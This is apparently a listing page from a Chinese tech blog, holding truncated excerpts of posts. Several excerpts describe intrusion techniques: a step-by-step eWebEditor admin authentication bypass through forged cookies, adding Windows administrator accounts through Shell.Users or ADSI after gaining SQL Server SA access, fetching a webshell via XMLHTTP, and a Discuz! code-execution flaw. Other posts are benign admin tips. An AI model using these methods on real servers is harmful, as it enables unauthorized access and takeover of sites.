预览模式: 普通 | 列表

命令行下一种新的加帐号的方法

用户控制面板文件nusrmgr.cpl,发现调用的是Shell.Users来加用户,它还同时调用了 wscript.shell、Shell.Application、Shell.LocalMachine这三个组件。不过加用户的话,这一个 Shell.Users就足够了。那么可能在删掉了net.exe和不用adsi之外,这也可能是一种新的加用户的方法。代码如下:

js:

var o=new ActiveXObject( "Shell.Users" );

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1324

ewebeditor后台通杀漏洞

今天看了下ewebeditor php的版本,记得以前看了php版,那个版本比较低,连后台都没
今天下了个3.8的,竟然找出一点令人兴奋的东西出来…
php版本后台是调用../ewebeditor/admin/config.php,大家去看下源码就知道
利用方法:首先当然要找到登陆后台,默认是../eWebEditor/admin/login.php,进入后台后随便输入一个用户和密码,当然会提示出错了.
这时候你清空浏览器的url,然后输入 javascript:alert(document.cookie=”adminuser=”+escape(”admin”)); javascript:alert(document.cookie=”adminpass=”+escape(”admin”)); javascript:alert(document.cookie=”admindj=”+escape(”1″));后三次回车,清空浏览器的 url,大家注意了,这次输入的url要注意,我们这次要输入的文件都是在正常情况下经过验证才能浏览的文件如../ewebeditor/admin /default.php

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1331

开了3389无法登录的5种原因

1、服务器在内网。
  2、做了tcp/ip筛选。
  先执行下面cmd命令:
  cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表里关于TCP/IP筛选的第一处
  cmd /c regedit -e c:\2.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip,导出注册表里关于TCP/IP筛选的第二处

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1326

Microsoft SQL Server SA权限安全

在获得SA密码后,往往因为服务器管理者或”前人”将net.exe和net1.exe被限制使用,无法添加管理员账号。我们知道VBS在活动目录(ADSI)部分有一个winnt对象,用来管理本地资源,利用它可以不依靠CMD等命令就能添加一个管理员,具体代码如下:


  set wsnetwork=CreateObject("WSCRIPT.NETWORK")
  os="WinNT://"&wsnetwork.ComputerName

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1328

xml.http 下载拿SHELL

摘自:hi.baidu.com/system_exp

注意以下语句在SA权限下执行,对于N多扩展存储过程被删除时使用效果最佳。
DECLARE
@B varbinary(8000),

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1326

Discuz! admin\styles.inc.php get-webshell bu

author: ring04h
team:http://www.80vul.com

由于Discuz!的admin\styles.inc.php里preg_match正则判断$newcvar变量操作不够严谨,导致执行代码漏洞.

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1328

Windows下Nginx以服务的方式运行

从wnmp发布以来,很多朋友就问Windows下如何将Nginx加入服务中,以便于服务器重启后自动运行,我在朋友的留言中回复了,可能不是很好找,便整理在此,便于需要的朋友查找。

假设nginx安装在c:\nginx\下:

1.下载微软服务注册工具srvany.exe, instsrv.exe, srvany-instsrv存放到c:\nginx\目录下

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1331

两个强制点击广告后才能下载的代码

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>中国站长天空-网页特效-综合特效-强制点击广告代码(一)</title>
<meta http-equiv="content-type" content="text/html;charset=gb2312">

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1327

批量替换mysql字段里的数据

Update ecs_goods SET goods_desc = replace(goods_desc, '(', '-') Where goods_ID=182

Update ecs_goods SET goods_desc = replace(goods_desc, ')', '') Where goods_ID=182
文件用文件替换软件替换下就可以了,数据库用如上的命令替换就可以。
文件名形式为11(1).jpg

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1327

淘宝网不支持文件名带括号的图片

如此从其他网站拷贝可视编辑过去的话如果图片带括号的话那在淘宝网上是显示不了的。
以下是编辑器fckeditor的修改方法,此编辑器上传图片的时候如果文件存在则把文件名字带个括号+标识数字。
fckeditor\editor\filemanager\connectors\php\commands.php
如下

查看更多...

分类:技术探讨 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 1329